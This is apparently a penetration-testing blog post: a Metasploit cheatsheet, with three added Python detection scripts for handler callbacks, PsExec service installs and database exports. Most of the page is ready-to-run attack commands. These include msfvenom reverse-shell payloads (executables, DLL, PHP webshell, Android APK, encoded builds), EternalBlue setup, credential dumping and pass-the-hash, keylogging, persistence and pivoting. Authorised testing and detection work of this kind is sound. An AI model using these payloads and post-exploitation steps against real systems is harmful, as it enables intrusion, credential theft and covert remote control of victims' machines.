
Metasploit Cheatsheet

Sep 25, 2024
3 min read
lawbyte

Metasploit is a staple of the exploitation phase. This cheatsheet covers the full workflow from module selection through post-exploitation — organized for quick lookup during engagements.

Starting and Connecting

# Start Metasploit
msfconsole
msfconsole -q # quiet mode (no banner)
msfconsole -r setup.rc # run resource script on start

# Database setup (for workspace and search)
msfdb init
db_status # verify connection

# Workspaces
workspace # list workspaces
workspace -a pentest # create workspace
workspace pentest # switch to workspace
workspace -d pentest # delete workspace

Searching Modules

search type:exploit platform:windows smb   # SMB exploits for Windows
search type:auxiliary name:scanner         # all auxiliary scanners
search cve:2017-0144                       # EternalBlue by CVE
search name:ms17_010                       # by module name
search rank:excellent type:exploit         # only excellent-rank exploits

# Module info
info exploit/windows/smb/ms17_010_eternalblue
info -d <module> # detailed with description

Module Workflow

# Select module
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options
show advanced # advanced options
show payloads # compatible payloads

# Set options
set RHOSTS 192.168.1.100
set RPORT 445
set LHOST 192.168.1.50
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Global options (persist across modules)
setg LHOST 192.168.1.50
setg LPORT 4444

# Verify and run
check # check if target is vulnerable (if supported)
run # execute
exploit # same as run
exploit -j # run in background as job

Common Payloads

# Staged (requires stager connection back)
windows/x64/meterpreter/reverse_tcp # most common Windows
windows/x64/meterpreter/reverse_https # HTTPS transport; looks like ordinary outbound web traffic, so it often passes egress filtering
linux/x64/meterpreter/reverse_tcp # Linux
osx/x64/meterpreter/reverse_tcp # macOS

# Stageless (entire payload in one)
windows/x64/meterpreter_reverse_tcp
linux/x64/meterpreter_reverse_tcp

# Simple shells (no Meterpreter)
windows/x64/shell/reverse_tcp
linux/x86/shell_reverse_tcp
cmd/unix/reverse_bash
cmd/unix/reverse_python

Payload Generation with msfvenom

# Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f exe -o shell.exe

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f dll -o shell.dll

# PowerShell command (one-liner)
msfvenom -p cmd/windows/reverse_powershell \
LHOST=192.168.1.50 LPORT=4444

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f elf -o shell.elf

# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.php

# Python
msfvenom -p python/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444

# Android APK
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-o payload.apk

# Encode (iterated encoder; note that encoders are well signatured, so this alone rarely evades modern AV)
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_shell.exe

Multi/Handler (Listener)

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false # keep listening after first connection
run -j # run as background job

# List active sessions
sessions
sessions -l # list all

# Interact with session
sessions -i 1 # attach session 1
sessions -u 1 # upgrade shell to Meterpreter
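The handler above listens on the framework's default LPORT 4444, and every reverse payload on this page calls back to it; that default is also what a lot of detection content keys on. The following is an added example, not code from the cheatsheet, showing the kind of rule a blue team runs over outbound connection records: it flags external endpoints on default handler ports, several internal hosts reaching the same endpoint, and a host that reconnects at a steady interval. The log lines are constructed and their layout (timestamp src dst dport proto) is an assumption, not any tool's real output.

```python
"""Flag outbound connections that look like callbacks to a Metasploit handler.

Added example, not part of the cheatsheet: the handler above listens on the
framework's default LPORT 4444 and the reverse payloads connect back to it.
The connection records below are constructed for this example, and their
layout (timestamp src dst dport proto) is an assumption, not any tool's output.
"""
from collections import defaultdict
from datetime import datetime

# Ports this cheatsheet and the framework use as defaults: 4444 for reverse_tcp,
# 8443 for reverse_https. Extend with the handler ports your own rules cover.
DEFAULT_HANDLER_PORTS = {4444, 8443}

# Constructed sample: 10.0.0.5 reconnects every 30s, a second host joins,
# and one host does ordinary HTTPS to an unrelated address.
SAMPLE_CONN_LOG = """\
2024-09-25T10:00:01 10.0.0.5 203.0.113.9 4444 tcp
2024-09-25T10:00:31 10.0.0.5 203.0.113.9 4444 tcp
2024-09-25T10:01:01 10.0.0.5 203.0.113.9 4444 tcp
2024-09-25T10:01:05 10.0.0.7 203.0.113.9 4444 tcp
2024-09-25T10:02:00 10.0.0.8 198.51.100.20 443 tcp
"""


def parse_conn_log(text):
    """Parse the constructed log format into (time, src, dst, dport, proto)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(dport), proto))
    return records


def find_handler_callbacks(records, internal_prefix="10.", min_sources=2):
    """Return one finding per external dst:port with the reasons it was flagged."""
    sources = defaultdict(set)      # (dst, dport) -> internal source IPs
    timeline = defaultdict(list)    # (src, dst, dport) -> connection times
    for ts, src, dst, dport, proto in records:
        if proto != "tcp" or not src.startswith(internal_prefix):
            continue
        if dst.startswith(internal_prefix):
            continue                # internal-to-internal: out of scope here
        sources[(dst, dport)].add(src)
        timeline[(src, dst, dport)].append(ts)

    findings = []
    for (dst, dport), srcs in sources.items():
        reasons = []
        if dport in DEFAULT_HANDLER_PORTS:
            reasons.append("default handler port %d" % dport)
        if len(srcs) >= min_sources:
            reasons.append("%d internal hosts reach the same endpoint" % len(srcs))
        # A host that reconnects at a steady interval behaves like a stager
        # retrying a handler (ExitOnSession false keeps accepting them).
        for src in sorted(srcs):
            stamps = sorted(timeline[(src, dst, dport)])
            if len(stamps) < 3:
                continue
            gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
            if max(gaps) - min(gaps) <= 5:
                reasons.append("%s reconnects every ~%ds"
                               % (src, round(sum(gaps) / len(gaps))))
        if reasons:
            findings.append({"dst": dst, "dport": dport,
                             "sources": sorted(srcs), "reasons": reasons})
    return sorted(findings, key=lambda f: (f["dst"], f["dport"]))


if __name__ == "__main__":
    for f in find_handler_callbacks(parse_conn_log(SAMPLE_CONN_LOG)):
        print("%s:%d <- %s" % (f["dst"], f["dport"], ", ".join(f["sources"])))
        for r in f["reasons"]:
            print("   -", r)
```

On the sample the only finding is 203.0.113.9:4444, with all three reasons attached; the plain HTTPS connection to 198.51.100.20:443 produces none. The port list and the 5-second jitter tolerance are the knobs a practitioner would tune for their own environment.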

Meterpreter Commands

System

sysinfo                   # OS, hostname, arch
getuid                    # current user
getpid                    # current PID
ps                        # process list
migrate <PID>             # migrate to another process (elevate or stabilize)
kill <PID>                # kill process
shell                     # drop to system shell
execute -f cmd.exe -i -H  # execute command in hidden window

File System

pwd                               # current directory
ls                                # list files
cd /tmp                           # change directory
upload /local/file /remote/path   # upload file
download /remote/file .           # download file
search -f *.txt -d C:\\           # search for files
cat /etc/passwd                   # read file
edit /etc/hosts                   # edit file
mkdir /tmp/loot                   # create directory
rm /tmp/file                      # delete file

Networking

ipconfig                                    # network interfaces
route                                       # routing table
netstat -ano                                # open connections
arp -a                                      # ARP table
portfwd add -l 8080 -p 80 -r 192.168.2.10   # port forward
portfwd list

Privilege Escalation

getuid                    # check current user
getsystem                 # attempt automatic privilege escalation
                          # (token impersonation, named pipe, etc.)

# If getsystem fails:
background
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Token Impersonation

use incognito
list_tokens -u # list available tokens
impersonate_token "DOMAIN\\Administrator"
getuid # verify token
drop_token # revert

Post-Exploitation Modules

# Credential harvesting
use post/windows/gather/credentials/credential_collector
use post/windows/gather/hashdump
use post/linux/gather/hashdump
use post/multi/gather/ssh_creds

# Pass the hash
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:hash_here

# Screenshot & keylogging
screenshot
keyscan_start
keyscan_dump
keyscan_stop

# Persistence (Windows)
use post/windows/manage/persistence_exe
use exploit/windows/local/persistence
run persistence -h # legacy Meterpreter script (deprecated in current releases); prefer the modules above

# Enumerate
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/linux/gather/enum_system
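The SMB PsExec module in the pass-the-hash block runs code on the target by installing a temporary service, which Windows records as System log Event ID 7045 (a new service was installed). That makes service installs the natural place for a defender to look. The following is an added example, not code from the cheatsheet, that scores such events with a few simple rules: a binary staged through the ADMIN$ share, the fixed PSEXESVC name that Sysinternals PsExec uses, a random-looking service name, and a binary dropped in the Windows root and named after its service. The events are constructed, and the dict layout is an assumption rather than any SIEM's schema.

```python
"""Score Windows service-install events (System log Event ID 7045) for
PsExec-style remote execution.

Added example, not from the cheatsheet: the SMB PsExec module listed above
runs code on the target by installing a temporary service, so service
installs are the natural place to look for it. The events below are
constructed for this example, and the dict layout is an assumption rather
than any SIEM's schema.
"""
import ntpath
import re

# Sysinternals PsExec installs its service under this fixed name.
KNOWN_PSEXEC_SERVICES = {"psexesvc"}

SAMPLE_7045_EVENTS = [  # constructed sample events
    {"host": "WS01", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe", "account": "LocalSystem"},
    {"host": "WS01", "service_name": "XkQwPzLmNa",
     "image_path": r"\\127.0.0.1\ADMIN$\XkQwPzLmNa.exe", "account": "LocalSystem"},
    {"host": "FS02", "service_name": "BackupAgent",
     "image_path": r"C:\Program Files\Backup\agent.exe", "account": r"NT AUTHORITY\LocalService"},
    {"host": "FS02", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
]


def looks_random(name):
    """Heuristic for generated service names: long, letters only, and either
    few vowels or many interior capitals in a mixed-case name. Tune the
    thresholds to your environment; all-caps product names are left alone."""
    if len(name) < 8 or not name.isalpha():
        return False
    vowel_ratio = sum(c in "aeiouAEIOU" for c in name) / len(name)
    mixed_case = not (name.isupper() or name.islower())
    interior_caps = sum(c.isupper() for c in name[1:])
    return vowel_ratio < 0.2 or (mixed_case and interior_caps >= 3)


def normalize_path(path):
    """Expand %SystemRoot% and strip quotes so directory checks are uniform."""
    path = path.strip('"')
    return re.sub(r"%systemroot%", r"C:\\Windows", path, flags=re.IGNORECASE)


def score_service_install(event):
    """Return the reasons this 7045 event looks like PsExec-style execution."""
    name = event["service_name"]
    path = normalize_path(event["image_path"])
    directory, base = ntpath.split(path)
    stem = ntpath.splitext(base)[0]
    reasons = []
    if re.search(r"\\ADMIN\$\\", path, re.IGNORECASE):
        reasons.append("binary staged through the ADMIN$ share")
    if name.lower() in KNOWN_PSEXEC_SERVICES:
        reasons.append("known PsExec service name")
    if looks_random(name):
        reasons.append("random-looking service name")
    if directory.lower() == r"c:\windows" and stem.lower() == name.lower():
        reasons.append("binary dropped in the Windows root and named after the service")
    return reasons


def suspicious_installs(events):
    """Return (host, service_name, reasons) for every event with at least one hit."""
    out = []
    for ev in events:
        reasons = score_service_install(ev)
        if reasons:
            out.append((ev["host"], ev["service_name"], reasons))
    return out


if __name__ == "__main__":
    for host, svc, reasons in suspicious_installs(SAMPLE_7045_EVENTS):
        print("%s: service %r -> %s" % (host, svc, "; ".join(reasons)))
```

On the sample, the Spooler and BackupAgent installs score nothing, the ADMIN$-staged random-named service gets two hits, and the PSEXESVC install gets the known-name and Windows-root hits. Real rules usually also pair the 7045 event with the preceding network logon (Event ID 4624, logon type 3) from the same source, which is the next refinement a practitioner would add.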

Pivoting

# Route traffic through session
route add 192.168.2.0/24 1 # subnet via session 1
route print

# SOCKS proxy through session
use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j

# Then use proxychains:
# proxychains nmap -sT -Pn 192.168.2.1

# Port forward
portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Connect to localhost:3389 to reach 192.168.2.10:3389

Database Commands

hosts                     # list hosts in DB
services                  # list discovered services
vulns                     # list vulnerabilities
creds                     # list credentials
loot                      # list captured loot

# Import Nmap scan into DB
db_nmap -sV -p- 192.168.1.0/24

# Export
db_export -f xml output.xml
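The XML that db_export writes is the handover point between the console and the report: it carries the hosts, their services and the vulns recorded against them. The following is an added example, not code from the cheatsheet, that parses such an export and answers the two questions a remediation tracker needs first: which hosts still expose a given port, and which CVE references were logged per host. The document below is constructed; its element layout (hosts/host/address, services/service/port, vulns/vuln/refs/ref) follows the MetasploitV5 export as I know it, but treat those element names as an assumption and check them against a real export before relying on this.

```python
"""Summarize a Metasploit database export for triage and reporting.

Added example, not from the cheatsheet: db_export -f xml writes the
workspace's hosts, services and vulns as XML. The document below is
constructed for this example and follows the element layout assumed for
the MetasploitV5 export (hosts/host/address, services/service/port,
vulns/vuln/name); verify the element names against a real export.
"""
import xml.etree.ElementTree as ET

SAMPLE_EXPORT = """<?xml version="1.0"?>
<MetasploitV5>
  <generated time="2024-09-25 10:00:00 UTC" user="analyst" project="pentest" product="framework"/>
  <hosts>
    <host>
      <id>1</id>
      <address>192.168.1.100</address>
      <name>dc01</name>
      <state>alive</state>
      <os-name>Windows</os-name>
      <services>
        <service><port>445</port><proto>tcp</proto><state>open</state><name>smb</name><info/></service>
        <service><port>3389</port><proto>tcp</proto><state>open</state><name>ms-wbt-server</name><info/></service>
      </services>
      <vulns>
        <vuln><name>MS17-010 SMB RCE Detection</name><info/><refs><ref>CVE-2017-0144</ref><ref>MSB-MS17-010</ref></refs></vuln>
      </vulns>
    </host>
    <host>
      <id>2</id>
      <address>192.168.1.101</address>
      <name>web01</name>
      <state>alive</state>
      <os-name>Linux</os-name>
      <services>
        <service><port>22</port><proto>tcp</proto><state>open</state><name>ssh</name><info>OpenSSH 8.9</info></service>
        <service><port>80</port><proto>tcp</proto><state>open</state><name>http</name><info/></service>
        <service><port>445</port><proto>tcp</proto><state>closed</state><name>smb</name><info/></service>
      </services>
      <vulns/>
    </host>
  </hosts>
</MetasploitV5>
"""


def text_of(elem, tag):
    """Text of a direct child element, or '' when it is absent or empty."""
    child = elem.find(tag)
    return (child.text or "").strip() if child is not None else ""


def parse_export(xml_text):
    """Return a list of host dicts: address, name, os, open services, vulns."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.iter("host"):
        services = []
        for s in h.iter("service"):
            if text_of(s, "state") != "open":
                continue  # closed/filtered ports only add noise to a report
            services.append({"port": int(text_of(s, "port")),
                             "proto": text_of(s, "proto"),
                             "name": text_of(s, "name"),
                             "info": text_of(s, "info")})
        vulns = []
        for v in h.iter("vuln"):
            refs = [r.text.strip() for r in v.iter("ref") if r.text]
            vulns.append({"name": text_of(v, "name"), "refs": refs})
        hosts.append({"address": text_of(h, "address"),
                      "name": text_of(h, "name"),
                      "os": text_of(h, "os-name"),
                      "services": services,
                      "vulns": vulns})
    return hosts


def hosts_exposing(hosts, port, proto="tcp"):
    """Addresses with the given port open, e.g. every host still answering SMB."""
    return sorted(h["address"] for h in hosts
                  if any(s["port"] == port and s["proto"] == proto
                         for s in h["services"]))


def cves_by_host(hosts):
    """Map address -> sorted CVE references, for the remediation tracker."""
    out = {}
    for h in hosts:
        cves = {r for v in h["vulns"] for r in v["refs"] if r.startswith("CVE-")}
        if cves:
            out[h["address"]] = sorted(cves)
    return out


if __name__ == "__main__":
    hosts = parse_export(SAMPLE_EXPORT)
    for h in hosts:
        ports = ", ".join("%d/%s %s" % (s["port"], s["proto"], s["name"])
                          for s in h["services"])
        print("%s (%s, %s): %s" % (h["address"], h["name"], h["os"], ports))
    print("SMB exposed:", hosts_exposing(hosts, 445))
    print("CVEs:", cves_by_host(hosts))
```

On the sample, only 192.168.1.100 counts as exposing 445 (web01 has it recorded as closed) and the CVE map contains just that host with CVE-2017-0144. Keeping the closed-port filter in the parser rather than in the report code is deliberate: every downstream consumer then sees the same view of the data.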

Resource Scripts

Automate repetitive tasks:

# Create setup.rc
cat > setup.rc << 'EOF'
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
run -j
EOF

msfconsole -r setup.rc

Common Module Quick Reference

Vulnerability            Module
EternalBlue (MS17-010)   exploit/windows/smb/ms17_010_eternalblue
BlueKeep (RDP)           exploit/windows/rdp/cve_2019_0708_bluekeep_rce
SMB PsExec               exploit/windows/smb/psexec
Tomcat WAR upload        exploit/multi/http/tomcat_mgr_upload
Struts2 RCE              exploit/multi/http/struts2_content_type_ognl
Log4Shell                exploit/multi/misc/log4shell_header_injection
ProxyLogon               exploit/windows/http/exchange_proxylogon_rce
ShellShock               exploit/multi/http/apache_mod_cgi_bash_env_exec
Heartbleed               auxiliary/scanner/ssl/openssl_heartbleed
SMB brute                auxiliary/scanner/smb/smb_login
SSH brute                auxiliary/scanner/ssh/ssh_login
FTP brute                auxiliary/scanner/ftp/ftp_login
